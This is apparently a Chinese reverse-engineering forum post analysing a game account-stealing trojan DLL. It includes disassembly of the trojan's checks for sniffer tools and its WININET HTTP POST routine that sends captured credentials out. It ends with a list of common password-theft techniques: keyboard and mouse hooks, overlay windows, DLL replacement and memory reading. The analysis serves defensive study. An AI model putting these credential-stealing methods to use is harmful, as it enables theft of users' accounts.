100036FA 68 80830010 push 10008380
100036FF 51 push ecx
10003700 66:AB stos word ptr es:[edi]
10003702 E8 C9F9FFFF call 100030D0
10003707 E8 74F9FFFF call 10003080
1000370C B9 09000000 mov ecx, 9
10003711 BE EC640010 mov esi, 100064EC
10003716 8DBC24 74010000 lea edi, dword ptr [esp+174]
1000371D 33C0 xor eax, eax
1000371F F3:A5 rep movs dword ptr es:[edi], dword ptr >
10003721 66:A5 movs word ptr es:[edi], word ptr [esi]
10003723 A4 movs byte ptr es:[edi], byte ptr [esi]
10003724 B9 0C000000 mov ecx, 0C
10003729 BF 4C830010 mov edi, 1000834C
1000372E F3:AB rep stos dword ptr es:[edi]
10003730 8D9424 74010000 lea edx, dword ptr [esp+174]
10003737 68 4C830010 push 1000834C
1000373C 52 push edx
1000373D 66:AB stos word ptr es:[edi]
1000373F E8 8CF9FFFF call 100030D0
10003744 83C4 40 add esp, 40
10003747 E8 34F9FFFF call 10003080
1000374C A1 E0640010 mov eax, dword ptr [100064E0]
10003751 8B0D E4640010 mov ecx, dword ptr [100064E4]
10003757 8B15 E8640010 mov edx, dword ptr [100064E8]
1000375D 898424 A4000000 mov dword ptr [esp+A4], eax
10003764 898C24 A8000000 mov dword ptr [esp+A8], ecx
1000376B B9 19000000 mov ecx, 19
10003770 33C0 xor eax, eax
10003772 BF E8820010 mov edi, 100082E8 ; ASCII "MiniSniffer"
10003777 F3:AB rep stos dword ptr es:[edi]
10003779 8D8424 A4000000 lea eax, dword ptr [esp+A4]
10003780 68 E8820010 push 100082E8 ; ASCII "MiniSniffer"
10003785 50 push eax
10003786 899424 B4000000 mov dword ptr [esp+B4], edx
1000378D E8 3EF9FFFF call 100030D0
10003792 8B0D CC640010 mov ecx, dword ptr [100064CC]
10003798 A1 D4640010 mov eax, dword ptr [100064D4]
1000379D 8B15 D0640010 mov edx, dword ptr [100064D0]
100037A3 898C24 98000000 mov dword ptr [esp+98], ecx
100037AA 8B0D D8640010 mov ecx, dword ptr [100064D8]
100037B0 898424 A0000000 mov dword ptr [esp+A0], eax
100037B7 898C24 A4000000 mov dword ptr [esp+A4], ecx
100037BE B9 19000000 mov ecx, 19
100037C3 33C0 xor eax, eax
100037C5 BF 84820010 mov edi, 10008284 ; ASCII "MiniSnifferClass"
100037CA F3:AB rep stos dword ptr es:[edi]
100037CC 899424 9C000000 mov dword ptr [esp+9C], edx
100037D3 8A15 DC640010 mov dl, byte ptr [100064DC]
100037D9 8D8424 98000000 lea eax, dword ptr [esp+98]
100037E0 68 84820010 push 10008284 ; ASCII "MiniSnifferClass"
100037E5 50 push eax
-----------------------------------------------
10003C0D E8 6EF4FFFF call 10003080
10003C12 5E pop esi
10003C13 81C4 20080000 add esp, 820
10003C19 C3 retn
因为是动态调试,所以无法跟到动态库把所获取的密码账号信息发送到指定网站,这个可以找到发送套接字部分的代码,但是只能静态看,还有我跟踪的时候可能不仔细没有找到木马对这两个嗅探工具的操作,应该是如果找到其进程要么自身退出,要么杀掉其进程.
10001FB9 6A 00 push 0
10001FBB 68 00000080 push 80000000
10001FC0 52 push edx
10001FC1 6A 00 push 0
10001FC3 68 CC620010 push 100062CC ; http/1.0
10001FC8 51 push ecx
10001FC9 68 C4620010 push 100062C4 ; post
10001FCE 50 push eax
10001FCF C74424 34 B8620>mov dword ptr [esp+34], 100062B8 ; accept: */*post
10001FD7 C74424 38 00000>mov dword ptr [esp+38], 0
10001FDF FF15 94500010 call dword ptr [<&WININET.HttpOpenReques>; WININET.HttpOpenRequestA
10001FE5 B9 0B000000 mov ecx, 0B
10001FEA BE 88620010 mov esi, 10006288 ; content-type:application/x-www-form-urlencoded
10001FEF 8D7C24 20 lea edi, dword ptr [esp+20]
10001FF3 33D2 xor edx, edx
10001FF5 F3:A5 rep movs dword ptr es:[edi], dword ptr >
10001FF7 66:A5 movs word ptr es:[edi], word ptr [esi]
10001FF9 A4 movs byte ptr es:[edi], byte ptr [esi]
10001FFA 8BB424 14010000 mov esi, dword ptr [esp+114]
10002001 66:895424 4F mov word ptr [esp+4F], dx
10002006 56 push esi
10002007 8BD8 mov ebx, eax
10002009 885424 55 mov byte ptr [esp+55], dl
1000200D FF15 24500010 call dword ptr [<&KERNEL32.lstrlenA>] ; kernel32.lstrlenA
10002013 50 push eax
10002014 56 push esi
10002015 8D4424 28 lea eax, dword ptr [esp+28]
10002019 6A FF push -1
1000201B 50 push eax
1000201C 53 push ebx
1000201D FF15 90500010 call dword ptr [<&WININET.HttpSendReques>; WININET.HttpSendRequestA
10002023 6A 00 push 0
10002025 8D4C24 20 lea ecx, dword ptr [esp+20]
10002029 6A 00 push 0
1000202B 51 push ecx
1000202C 53 push ebx
1000202D FF15 8C500010 call dword ptr [<&WININET.InternetQueryD>; WININET.InternetQueryDataAvailable
10002033 8B35 9C500010 mov esi, dword ptr [<&WININET.InternetC>; WININET.InternetCloseHandle
10002039 53 push ebx
1000203A FFD6 call esi
我水平有限只能分析到这个水平了,里面细节我还有很多不明白,有高手能有什么好的方法动态调试DLL文件吗,指教下
最后简单说一下盗号木马常用的方法:
1,首先查找游戏进程,然后结束掉其进程,然后安装鼠标键盘等钩子,等玩家再次输入账号密码的时候则记录下来,这种方法是比较常见的,所以在玩游戏时,游戏莫名退出,则很可能是木马所为
2,还一种就是在登陆窗口前建立一个透明的窗口,用户输入的用户名密码则被木马首先得到,然后它把用户名密码再传递到真正的游戏窗口
3,本文中的木马是直接替换游戏目录下的文件,让游戏自动加载到游戏进程中,然后在通过钩子获取想要的信息
4,通过读取内存
还有。。。暂时想不起来了
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
没看懂,
